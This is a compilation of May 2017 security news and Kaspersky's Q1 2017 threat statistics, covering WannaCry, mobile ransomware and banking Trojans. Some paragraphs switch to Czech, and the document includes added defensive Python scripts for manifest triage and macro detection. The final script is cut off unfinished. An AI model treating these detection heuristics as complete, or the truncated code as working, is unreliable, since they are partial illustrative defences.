Although the spread of the malicious code WannaCry was stopped, this uninvited guest still managed to infect some 300,000 computers in various corners of the world in just a few hours. And the overwhelming majority of them unfortunately remain locked. Security experts will now try to remedy this with a tool called WannaKey.
WannaCry, both the first and the improved second generation, attacks in exactly the same way as other extortion viruses, collectively referred to as ransomware. First the malicious code penetrates the computer, then it locks it and encrypts all the data. The cyber pirates then demand a ransom to make the data accessible again.

It must be stressed, however, that even after paying the ransom, users have no guarantee that they will get their data back.

And that is precisely what is now causing headaches for the hundreds of thousands of users hit by the cyber infection called WannaCry. They can reinstall the operating system so that the computer can be used again, but they simply cannot get to their data.

Na dešifrovacím nástroji se již pracuje
Všem postiženým však nyní svitla naděje díky bezpečnostní společnosti QuarksLab. Ta údajně již testuje nástroj, který dokáže šifrování škodlivého kódu WannaCry obejít a data opět zpřístupnit.

Kybernetický expert Adrien Guinet, který pracuje právě pro QuarksLab, totiž objevil klíč, který je k dešifrování potřebný. A s jeho pomocí nyní finalizuje nástroj zvaný WannaKey, který uzamčené počítače odemkne. A to i bez placení výkupného.

Prací na dešifrovacím nástroji se pochlubili i další bezpečnostní výzkumníci, kteří působí ve Francii. Je tedy velmi pravděpodobné, že by se uživatelé skutečně mohli v brzké době dočkat aplikace, díky které již WannaCry nebude představovat noční můru.

Nejvíce postiženo Rusko
WannaCry se začal internetem šířit v polovině května. Za pouhých pár hodin stihl nakazit více než 300 000 počítačů ve více než 150 zemích světa. Takřka polovina všech zachycených detekcí (45,07 %) připadá na Rusko. Je to dáno tím, že především v tamních chudých lokalitách ještě uživatelé hojně používají zastaralý operační systém Windows XP, který byl proti škodlivému kódu WannaCry nejvíce zranitelný.

Druhou a třetí příčku pak zaujaly Ukrajina (11,88 %) a Tchaj-wan (11,55 %). Ostatní státy, které se dostaly v žebříčku nejpostiženějších zemí do první desítky, měly podíl tak v řádech jednotek procent. Šlo například o Egypt, Indii či Filipíny.

Česká republika skončila v přehledu s podílem 0,15 % až na 52. místě. Sluší se nicméně podotknout, že spodní příčky měly velmi podobný podíl až prakticky do konce žebříčku, který obsahovat 150 států. Například sousední Slovensko však na tom bylo hůře – virus WannaCry tam měl podíl 0,26 %.

V Česku byly přitom infikovány stovky strojů. „Podle našich údajů počet infekcí překonal číslovku 620,“ uvedl již dříve na dotaz Novinek Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ.


Beware of mobiles: ransomware is finding a new and easy target

23.5.2017 SecurityWorld Viruses
The volume of mobile ransomware more than tripled in the first quarter of this year. Malware of this type cleverly exploits the acquisition of administrator rights on the device.

According to data from Kaspersky Lab’s “Malware in Q1 2017” report, extortion malware is not letting up. The number of detected mobile ransomware files climbed to 218,625 in the first quarter of 2017, 86% of which is attributable to the Congur ransomware family.

For comparison, mobile ransomware was detected in only 61,832 cases in the last quarter of last year. During the first three months of this year, 55,679 new ransomware modifications targeting all devices, systems and networks also appeared, behind which stood 11 new encryption families.

The primary goal of the Congur ransomware family is to prevent the user from accessing the device. By resetting or restoring its PIN (password) it obtains administrator rights to it. Some malware variants additionally abuse these rights to install their modules into the system folder, from where they are almost impossible to remove.

Despite the popularity of the Congur family, Trojan-Ransom.AndroidOS.Fusob.h remained the most widespread mobile ransomware. It was responsible for 45% of attacks of this type in Q1 2017.

Immediately after launch, this Trojan demands administrator privileges and at the same time collects information about the device, including GPS location and call history. It then uploads this data to a fraudulent server, which, based on the information received, can issue a command to block the device.

The country with the highest number of devices attacked by mobile ransomware in the first quarter of this year was the United States. The most widespread threat there was the Svpeng ransomware.

Over the past quarter, the number of newly detected ransomware modifications targeting Windows almost doubled. From January to March 2017, 55,679 were detected, compared with 29,450 for October to December last year. The Cerber family is responsible for most of these new modifications.

Other data from the Kaspersky Lab report:

Web antivirus tools detected 79,209,775 unique malicious URLs.
Attempts by cybercriminals to steal money through online banking malware infections were registered on 288,000 user computers.
Attacks by encrypting ransomware were blocked on 240,799 computers.
Kaspersky Lab antivirus detected a total of 174,989,956 unique malicious and potentially unwanted objects.


How to prevent global malware attacks like WannaCry?

23.5.2017 SecurityWorld Viruses
The recent WannaCry malware attack, which paralysed hospitals, government organisations and individual users around the world, need not have happened at all. It was no technological miracle built and spread by a genius hacker.

Its authors merely exploited the laxity of security measures among users and organisations alike, as well as the creeping corrosive influence that the National Security Agency (NSA) and many technology giants have on global internet security.

In fact, that is actually good news, because it means that preventing the next similar attack need not be impossible. Here are five steps that can help:

1) Stop the NSA from stockpiling security flaws

The attack was built on a hacking tool devised by the NSA and subsequently stolen and publicly released by a group calling itself the Shadow Brokers. As the New York Times noted, this was apparently the first attack with a “cyberweapon developed at the NSA, paid for with taxpayers’ money” that was subsequently turned against them.

It is common practice for the NSA to find flaws in operating systems and to program tools to exploit them, quite often without coordinating this with the vendor.

The administration of former president Barack Obama pushed the NSA into partial cooperation with vendors, and the agency shared some of the holes it discovered, but the WannaCry attack targeted critical points that the NSA had kept to itself.

It drew criticism from Microsoft for that; the software giant also appealed to governments to adopt entirely new measures on cybercrime, including cooperation between government agencies and software vendors.

2) Demand that vendors distribute security patches to everyone, not just paying customers

In March, Microsoft published a patch fixing the flaw that WannaCry exploited. This most likely happened after the NSA warned it that hackers had got hold of its tools and could abuse them.

Microsoft published another patch, including for the no-longer-supported Windows XP, after the hackers had struck. According to experts, such measures should be standard; at present, operating systems that are no longer supported are patched only for paying clients.

3) IT departments should face the consequences of attacks they could have prevented

The WannaCry attack exposed a surprising incompetence of IT departments across industries. The attack could have been prevented if those departments had promptly and consistently applied the patches that were already available.

4) Users should get used to automatic updates

Automatic Windows 10 updates have caused outrage among many users. According to some experts, however, they should get over it and accept them as mandatory vaccination: full vaccination coverage stops the infection from spreading. Only updates unrelated to security should be optional.

5) Governments should curb piracy

China was hit particularly hard by the WannaCry malware, because most copies of Windows there are pirated, which also means such systems do not receive security updates. And it is not just that the government does not suppress piracy enough; illegal software in China also runs the computers of government officials.

The situation in Russia is similar. According to a study by the BSA Software alliance from two years ago, 70% of all software in China and 64% in Russia is inadequately licensed. And the larger this share, the greater the risk that a malware infection will spread further.


IT threat evolution Q1 2017. Statistics
23.5.2017 Kaspersky Analysis

According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world.

79,209,775 unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers.

Crypto ransomware attacks were blocked on 240,799 computers of unique users.

Kaspersky Lab’s file antivirus detected a total of 174,989,956 unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

1,333,605 malicious installation packages;
32,038 mobile banker Trojans (installation packages);
218,625 mobile ransomware Trojans (installation packages).
Mobile threats

Q1 events

The rise of Trojan-Ransom.AndroidOS.Egat

In the first quarter of 2017, we registered a dramatic growth in attacks involving mobile ransomware from the Trojan-Ransom.AndroidOS.Egat family: the number of users attacked by this type of malware increased more than 13 times from the previous quarter. Despite this Trojan being known to us since June 2016, such an explosive increase in the number of attacks has only occurred now.

This malware has standard mobile ransomware functionality: it blocks the device, overlays all open windows with its own window, then demands money to unblock the device. In most cases, the ransom amount fluctuates between $100 and $200. Most of the attacked users were in Europe, mainly Germany, the UK and Italy.

Revamped ZTorg

We managed to detect around 30 new Trojans from the Ztorg family in the official Google Play Store. To recap, this is the family that gave us infected fake guides for Pokémon GO. It was discovered in Google Play in the summer of 2016 and was installed more than 500,000 times. After installation, Ztorg checks to make sure it isn’t running on a virtual machine. If the check is passed smoothly, the main module is loaded from a remote server. By exploiting a vulnerability in the system, the Trojan tries to gain superuser privileges. If successful, it installs its modules into the system folders and also modifies the device settings so that it remains there – even after a reset to factory settings.

 

Trojan.AndroidOS.Ztorg.bp in the official Google Play Store

The Trojan uses several different modules that secretly download and install various programs on the device, display ads and even buy apps. It should be noted that the functionality of this malware has changed a bit: the number of checks to verify whether the device is real has decreased; the code for downloading, decrypting and loading the main module has been placed in a downloaded library.

Asacub awakens

In the first quarter of 2017, we noted that the Trojan-Banker.AndroidOS.Asacub mobile banker was actively spreading. Over three months, the representatives of this family attacked more than 43,000 mobile devices, which was 2.5 times more than in the previous quarter. Over 97% of all attacked users were in Russia. Asacub was mainly distributed via SMS spam. After clicking a malicious link, users were directed to a page where they were prompted to view an MMS that concealed the Trojan, which was then downloaded to the device. Interestingly, if the same link was opened on a Windows device, Backdoor.Win32.Htbot.bs was downloaded.

 

The site from which Trojan-Banker.AndroidOS.Asacub was downloaded

It’s worth noting that Trojan-Banker.AndroidOS.Asacub is constantly expanding its spyware functionality. In addition to the standard mobile banker features, such as stealing and sending text messages, or overlaying various applications with phishing windows, this Trojan hunts for the user’s call history, contacts and GPS location.

Mobile threat statistics

In the first quarter of 2017, Kaspersky Lab detected 1,333,605 malicious installation packages, which is almost as many as in Q4 2016.

 

Number of detected malicious installation packages (Q2 2016 – Q1 2017)

Distribution of mobile malware by type

 

Distribution of new mobile malware by type (Q4 2016 and Q1 2017)

In Q1 2017, the most affected was Trojan-Ransom – its share increased from 4.64% to 16.42%, that is 3.5 times. The most rapid growth in the number of installation packages was demonstrated by the Trojan-Ransom.AndroidOS.Congur family, which will be described below.

Second came Trojan-Spyware: its proportion reached 10.27% (+1.83%). This was caused by the increase in the number of malicious programs belonging to the Trojan-Spy.AndroidOS.SmForw and Trojan-Spy.AndroidOS.SmsThief families, which are designed to steal SMS.

In the first quarter, the biggest decline was demonstrated by Adware (7.32%) and Trojan-Dropper (6.99%) – their shares decreased by 4.99% and 4.48% respectively. In addition, the contribution of unwanted RiskTool programs dropped by 2.55%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

In Q1 of 2017, 14 Trojans that use advertising as their main means of monetization (highlighted in blue in the original table) made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user by various methods, including the installation of new adware. These Trojans may use superuser privileges to hide themselves in the system application folder, from which they are very difficult to delete.

No. | Name | % of attacked users *
1 | DangerousObject.Multi.Generic | 70.09
2 | Trojan.AndroidOS.Hiddad.an | 9.35
3 | Trojan.AndroidOS.Boogr.gsh | 4.51
4 | Backdoor.AndroidOS.Ztorg.c | 4.18
5 | Trojan.AndroidOS.Sivu.c | 4.00
6 | Backdoor.AndroidOS.Ztorg.a | 3.98
7 | Trojan.AndroidOS.Hiddad.v | 3.89
8 | Trojan-Dropper.AndroidOS.Hqwar.i | 3.83
9 | Trojan.AndroidOS.Hiddad.pac | 2.98
10 | Trojan.AndroidOS.Triada.pac | 2.90
11 | Trojan.AndroidOS.Iop.c | 2.60
12 | Trojan-Banker.AndroidOS.Svpeng.q | 2.49
13 | Trojan.AndroidOS.Ztorg.ag | 2.34
14 | Trojan.AndroidOS.Ztorg.aa | 2.03
15 | Trojan.AndroidOS.Agent.eb | 1.81
16 | Trojan.AndroidOS.Agent.bw | 1.79
17 | Trojan.AndroidOS.Loki.d | 1.76
18 | Trojan.AndroidOS.Ztorg.ak | 1.67
19 | Trojan-Downloader.AndroidOS.Agent.bf | 1.59
20 | Trojan-Dropper.AndroidOS.Agent.cv | 1.54
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place was occupied by DangerousObject.Multi.Generic (70.09%), the verdict used for malicious programs detected using cloud technologies. Cloud detection applies when the antivirus databases contain neither the signatures nor the heuristics to detect a malicious program, but the antivirus company’s cloud already holds information about the object. This is basically how the very latest malware is detected.

Trojan.AndroidOS.Hiddad.an (9.35%) was second. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to resist removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts; its main “audience” is in Russia (86% of attacked users).

Third came Trojan.AndroidOS.Boogr.gsh (4.51%). This verdict is issued for files recognized as malicious by our machine-learning system. Although this system can detect any type of malware, in Q1 2017 the most common detections were advertising Trojans that used superuser privileges.

Eighth position in the ranking was occupied by Trojan-Dropper.AndroidOS.Hqwar.i (3.83%), the verdict used for the Trojans protected by a certain packer/obfuscator. In most cases, this name hides the representatives of the FakeToken and Svpeng mobile banking families.

The ranking also included Trojan-Banker.AndroidOS.Svpeng (2.49%), which was twelfth in the Top 20. This family has been active for three quarters in a row and remains the most popular banking Trojan in Q1 of 2017.

Trojan.AndroidOS.Agent.bw was sixteenth in the rating (1.79%). This Trojan, targeting primarily people in India (more than 92% of attacked users), just like Trojan.AndroidOS.Hiddad.an imitates popular programs and games, and once run, downloads and installs various applications from the fraudsters’ server.

The geography of mobile threats
 

The geography of attempted mobile malware infections in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

No. | Country* | % of users attacked **
1 | Iran | 47.35
2 | Bangladesh | 36.25
3 | Indonesia | 32.97
4 | China | 32.47
5 | Nepal | 29.90
6 | India | 29.09
7 | Algeria | 28.64
8 | Philippines | 27.98
9 | Nigeria | 27.81
10 | Ghana | 25.85
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q1 2017, Iran was the country with the highest percentage of users attacked by mobile malware – 47.35%. Bangladesh came second: 36.25% of users there encountered a mobile threat at least once during the quarter. It was followed by Indonesia and China; the share of both countries was slightly over 32%.

Russia (11.6%) came 40th in this rating, France (8.1%) 57th, the US (6.9%) 69th, Italy (7.1%) 66th, Germany (6.2%) 72nd and Britain (5.8%) 75th.

The safest countries were Finland (2.7%), Georgia (2.5%) and Japan (1.5%).

In all the countries of the Top 20, the same mobile objects are detected: adware, first of all representatives of the AdWare.AndroidOS.Ewind family, as well as advertising Trojans.

Mobile banking Trojans

Over the reporting period, we detected 32,038 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q4 2016.

 

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2016 – Q1 2017)

Trojan-Banker.AndroidOS.Svpeng remained the most popular mobile banking Trojan for the third quarter in a row. This family of mobile banking Trojans uses phishing windows to steal credit card data and the logins and passwords of online banking accounts. In addition, the fraudsters steal money via SMS services, including mobile banking. Svpeng is followed by Trojan-Banker.AndroidOS.Faketoken.z and Trojan-Banker.AndroidOS.Asacub.san. It is worth noting that most of the attacked users were in Russia.

 

Geography of mobile banking threats in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

No. | Country* | % of users attacked**
1 | Russia | 1.64
2 | Australia | 1.14
3 | Turkey | 0.81
4 | Uzbekistan | 0.61
5 | Tajikistan | 0.48
6 | Moldova | 0.43
7 | Ukraine | 0.41
8 | Kazakhstan | 0.37
9 | Kyrgyzstan | 0.32
10 | Singapore | 0.26
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

Although the Svpeng family topped the rating of the most popular mobile banking Trojans in the first quarter of 2017, its activity declined compared to the third quarter of 2016: the share of users attacked by these malicious programs in Russia dropped almost twofold, from 3.12% to 1.64%. At the same time, Russia remained the leader of the rating.

In second place was Australia (1.14%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats. Turkey (0.81%) rounded off the Top 3.

Mobile Ransomware

In Q1 2017, we detected 218,625 mobile Trojan-Ransomware installation packages, which is 3.5 times more than in the previous quarter.
 

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q2 2016 – Q1 2017)

In the first half of 2016, we saw an increase in the number of mobile ransomware installation packages caused by the active spread of the Trojan-Ransom.AndroidOS.Fusob family. In the second half of the same year, the activity of this family fell, which affected the number of detected installation packages. The growth resumed in the fourth quarter of 2016 and sharply accelerated in Q1 2017. The reason was the Trojan-Ransom.AndroidOS.Congur family: more than 86% of detected mobile ransomware installation packages belonged to it. Usually, the representatives of Congur have very simple functionality. They change the system password (PIN), or set one if no password was set earlier, thus making it impossible to use the device, and then ask the user to contact the fraudsters via the QQ messenger to unblock it. It is worth noting that there are modifications of this Trojan that can take advantage of existing superuser privileges to install their module into the system folder.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the first quarter, accounting for nearly 45% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and uploads the data to a malicious server. After that, it may receive a command to block the device.
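The locker and banker behaviours described in this report (device-administrator rights used to change the PIN and resist removal, overlay windows that cover every other app, SMS theft, GPS and call-log collection) all leave traces in the app's manifest, which makes the manifest a cheap first filter when an analyst has to prioritise thousands of installation packages. The Python triage script below is an added example, not Kaspersky code or any vendor tool. It assumes the AndroidManifest.xml has already been decoded from binary XML to plain XML (for instance with apktool); the two manifests embedded in it are constructed for illustration rather than taken from real samples, and the indicator weights are a constructed heuristic, not a published scoring scheme.

```python
"""Triage of decoded Android manifests for the capabilities the mobile
ransomware and banker families above depend on.

Added example, not Kaspersky code. It assumes AndroidManifest.xml has already
been decoded from binary XML to plain XML (for example with apktool). The two
manifests embedded here are constructed for illustration, and the indicator
weights are a constructed heuristic, not a published scoring scheme.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % ANDROID_NS
A_PERMISSION = "{%s}permission" % ANDROID_NS

SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS",
    "android.permission.READ_SMS",
}
CALL_PERMISSIONS = {
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_CONTACTS",
}

# indicator -> (what it enables, weight); weights are a constructed heuristic
INDICATORS = {
    "device_admin": ("device administrator receiver: can change the lock PIN and resist uninstall", 3),
    "overlay": ("SYSTEM_ALERT_WINDOW: can cover every window with a lock or phishing screen", 2),
    "sms": ("SMS permissions: can read, intercept or send text messages", 2),
    "location": ("ACCESS_FINE_LOCATION: collects the GPS position", 1),
    "call_log": ("call log / contacts access: harvests call history and contacts", 1),
}


def analyze_manifest(xml_text: str) -> dict:
    """Return the indicators found in a decoded manifest and a triage score."""
    root = ET.fromstring(xml_text)
    permissions = {el.get(A_NAME) for el in root.iter("uses-permission")}
    found = set()

    # A device-admin component is a receiver guarded by BIND_DEVICE_ADMIN
    # and/or listening for the DEVICE_ADMIN_ENABLED action.
    for receiver in root.iter("receiver"):
        if receiver.get(A_PERMISSION) == "android.permission.BIND_DEVICE_ADMIN":
            found.add("device_admin")
        for action in receiver.iter("action"):
            if action.get(A_NAME) == "android.app.action.DEVICE_ADMIN_ENABLED":
                found.add("device_admin")

    if "android.permission.SYSTEM_ALERT_WINDOW" in permissions:
        found.add("overlay")
    if permissions & SMS_PERMISSIONS:
        found.add("sms")
    if "android.permission.ACCESS_FINE_LOCATION" in permissions:
        found.add("location")
    if permissions & CALL_PERMISSIONS:
        found.add("call_log")

    return {
        "indicators": sorted(found),
        "score": sum(INDICATORS[k][1] for k in found),
        "reasons": [INDICATORS[k][0] for k in sorted(found)],
    }


# Constructed manifest with the locker profile described in the report:
# device admin, overlay, GPS and call-log access behind a harmless-looking label.
LOCKER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakeplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <application android:label="Video Player">
    <receiver android:name=".AdminReceiver"
        android:permission="android.permission.BIND_DEVICE_ADMIN">
      <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed manifest of an ordinary app that only needs network access.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes"/>
</manifest>"""

if __name__ == "__main__":
    for label, manifest in (("locker", LOCKER_MANIFEST), ("benign", BENIGN_MANIFEST)):
        result = analyze_manifest(manifest)
        print(label, result["score"], result["indicators"])
```

A high score is a reason to look closer, not a verdict: legitimate MDM agents and parental-control apps also register device-admin receivers, and Google's own policy changes later moved many of these permissions behind runtime prompts. The point of the check is the combination, for instance device admin together with an overlay permission on an app that presents itself as a video player.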
 

Geography of mobile Trojan-Ransomware in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

No. | Country* | % of users attacked**
1 | USA | 1.23
2 | Uzbekistan | 0.65
3 | Canada | 0.56
4 | Kazakhstan | 0.54
5 | Italy | 0.44
6 | Germany | 0.37
7 | Korea | 0.35
8 | Denmark | 0.30
9 | United Kingdom | 0.29
10 | Spain | 0.28
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

The US topped the ranking of ten countries attacked by mobile Trojan-Ransomware; the most popular family there was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of $100-500 from victims to unblock their devices.

In Uzbekistan (0.65%), which came second, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Loluz.a. This is a simple Trojan that blocks the device with its own window and asks the user to contact the fraudsters by phone to unblock it.

Fourth place was occupied by Kazakhstan (0.54%). The main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demanding $10 to unblock it.

In all other countries of the TOP 10, the most popular Trojan-Ransom family was Fusob.

Vulnerable apps exploited by cybercriminals

The first quarter of 2017 was marked by the return of the faded exploit kit Neutrino, which had left the cybercriminal market in the third quarter. Following Magnitude, Neutrino is changing its distribution format and abandoning wide-scale campaigns to become a “private” exploit kit. Several new players (Nebula, Terror and others) tried to fill the vacant niche but failed: after a brief burst of activity their distribution quickly came to nothing. At the moment, RIG and its modifications remain the most popular and advanced public exploit kit.

The Q1 statistics show an almost 10% decline in the number of attacked users. This is primarily caused by the weak state of the exploit kit market, as well as the decrease in the effectiveness of exploits in general. Adobe Flash remained the only platform that showed growth: although no new vulnerabilities for it had been discovered, the number of attacked users grew by 20%. The biggest decrease fell on exploits for browsers: only 44% of attacks targeted them (against 54% in the previous quarter).

CVE-2016-0189, CVE-2014-6332 and CVE-2013-2551 remained the most popular vulnerabilities in the first quarter. Also of note were vulnerabilities in the Microsoft Edge Chakra engine, published openly in early 2017. In addition to a detailed description of the vulnerabilities, the research included a ready-to-use proof of concept, which shortly after publication was integrated into the Sundown exploit kit, from which it moved to Neutrino, Kaixin and others. However, exploitation of these vulnerabilities was not reliable enough, and patches for them had been released as far back as November with the MS16-129 update, so they have not become widespread and are now almost out of use.

 

Distribution of exploits used in attacks by the type of application attacked, Q1 2017

In Q1 2017, campaigns involving mass mailings of infected documents were especially popular; Microsoft Office exploits were used to distribute them. Although the share of attacked office package users has not changed much, the same users were attacked several times: on average, one attacked user received 3 malicious documents over the quarter.

The general trend is towards a growing share of social engineering in delivering malware to the computer of a potential victim. Campaigns involving the distribution of infected messages always rely on making the user perform certain actions: unpack a file from a password-protected archive, grant permission to execute macros from the document, and so on. This method is now beginning to be applied in exploits for browsers as well. Magnitude, for example, prompts Internet Explorer 11 and Windows 10 users to download a malicious file under the guise of an antivirus update for Microsoft Defender. Some spam campaigns imitate the Google Chrome update page. We believe that this trend will continue in the future: such campaigns are easier to maintain and implement, and their level of “penetration” is constantly growing.
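The document campaigns described above depend on the recipient granting permission to run macros, so a mail gateway or an analyst can check for that prerequisite before the document reaches anyone. In the OOXML formats (.docx/.docm, .xlsx/.xlsm and so on) the VBA project is stored as a vbaProject.bin part inside the zip container, whereas the legacy binary .doc/.xls formats are OLE2 compound files and need a different parser (olevba from oletools is the usual choice). The Python check below is an added example, not part of the Kaspersky report or of any vendor product; it classifies by magic bytes rather than trusting the file extension, and the sample documents it builds are constructed minimal containers, not real files.

```python
"""Check a mail attachment for embedded VBA macros before it reaches a user.

Added example, not part of the Kaspersky report. OOXML documents are zip
containers in which VBA code lives in a vbaProject.bin part; legacy OLE2
documents (.doc/.xls) need a dedicated parser and are only flagged here.
The sample documents built below are constructed minimal containers.
"""
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
MACRO_ENABLED_EXTENSIONS = {"docm", "dotm", "xlsm", "xltm", "xlam", "pptm", "potm", "ppam"}


def container_kind(data: bytes) -> str:
    """Classify by magic bytes rather than by file extension."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    return "unknown"


def find_macro_parts(data: bytes) -> list:
    """Names of VBA project parts inside an OOXML container (empty if none)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [name for name in zf.namelist()
                if name.lower().rsplit("/", 1)[-1] == "vbaproject.bin"]


def assess_attachment(filename: str, data: bytes) -> dict:
    """Summarise what a gateway needs in order to decide on the attachment."""
    kind = container_kind(data)
    macro_parts = find_macro_parts(data) if kind == "ooxml" else []
    extension = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    return {
        "container": kind,
        "macro_parts": macro_parts,
        "has_macros": bool(macro_parts),
        # macros inside a file named .docx/.xlsx is a name/content mismatch worth flagging
        "extension_claims_macros": extension in MACRO_ENABLED_EXTENSIONS,
        # OLE2 files are handed to a dedicated parser such as olevba
        "needs_ole_scan": kind == "ole2",
    }


def build_sample_ooxml(with_macros: bool) -> bytes:
    """Constructed minimal Word-like container (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            # a real vbaProject.bin is itself an OLE2 stream; this is a placeholder
            zf.writestr("word/vbaProject.bin", OLE2_MAGIC + b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in (("report.docx", build_sample_ooxml(False)),
                       ("invoice.docm", build_sample_ooxml(True)),
                       ("old.doc", OLE2_MAGIC + b"\x00" * 8)):
        print(name, assess_attachment(name, blob))
```

Presence of a macro is a policy decision point rather than proof of malice: many organisations quarantine every macro-bearing attachment from outside the company and let the recipient request release, which removes the "please enable content" social engineering step entirely.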

Online threats (Web-based attacks)

Online threats in the banking sector

These statistics are based on the detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017, the statistics include malicious programs for ATMs and POS terminals but do not include mobile threats.

Kaspersky Lab solutions blocked attempts to launch one or several malicious programs capable of stealing money via online banking on 288,000 computers in Q1 2017.

 

Number of users attacked by financial malware, January – March 2017

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

 

Geography of banking malware attacks in Q1 2017 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

No. | Country* | % of attacked users **
1 | Germany | 1.70
2 | China | 1.37
3 | Libya | 1.12
4 | Kazakhstan | 1.02
5 | Palestine | 0.92
6 | Togo | 0.91
7 | Tunisia | 0.89
8 | Armenia | 0.89
9 | Venezuela | 0.88
10 | Taiwan | 0.87
These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).

** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the first quarter of 2017, Germany (1.70%) had the highest proportion of users attacked by banking Trojans. It was followed by China (1.37%). Libya (1.12%) rounded off the Top 3.

Among the other European countries in the Q1 rating, Spain (0.24%) was in 89th position and the UK (0.15%) came 126th.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

No. | Name* | % of attacked users**
1 | Trojan-Spy.Win32.Zbot | 45.93
2 | Trojan.Win32.Nymaim | 29.70
3 | Trojan.Win32.Neurevt | 3.31
4 | Trojan-Banker.Win32.Gozi | 3.15
5 | Trojan-Spy.Win32.SpyEyes | 2.71
6 | Backdoor.Win32.ZAccess | 2.11
7 | Backdoor.Win32.Shiz | 1.67
8 | Trojan.Multi.Capper | 1.67
9 | Trojan.Win32.Tinba | 1.00
10 | Trojan.Win32.Shifu | 1.00
* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.
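The footnotes under the country table and the family table define two different denominators, and mixing them up is the most common way these figures get misread: a country's number is the share of that country's product users who encountered the threat at least once (with countries under 10,000 users dropped), while a family's number is the share of all attacked users worldwide who met that family, so the family column can add up to more than 100% when one user is hit by several families. The Python code below, an added example rather than Kaspersky's own pipeline, computes both from per-user telemetry records; the records it builds are constructed synthetically and the country codes and counts are made up.

```python
"""Per-country attack rate and per-family share from per-user telemetry.

Added example: it mirrors the two denominators the report footnotes describe,
not Kaspersky's actual pipeline. The telemetry below is constructed.
"""
from collections import defaultdict

MIN_USERS_PER_COUNTRY = 10_000  # threshold used in the report's country tables

# Constructed sample: country -> (total product users, attacked-user groups).
# A group key is one family name or a tuple of families seen by the same user.
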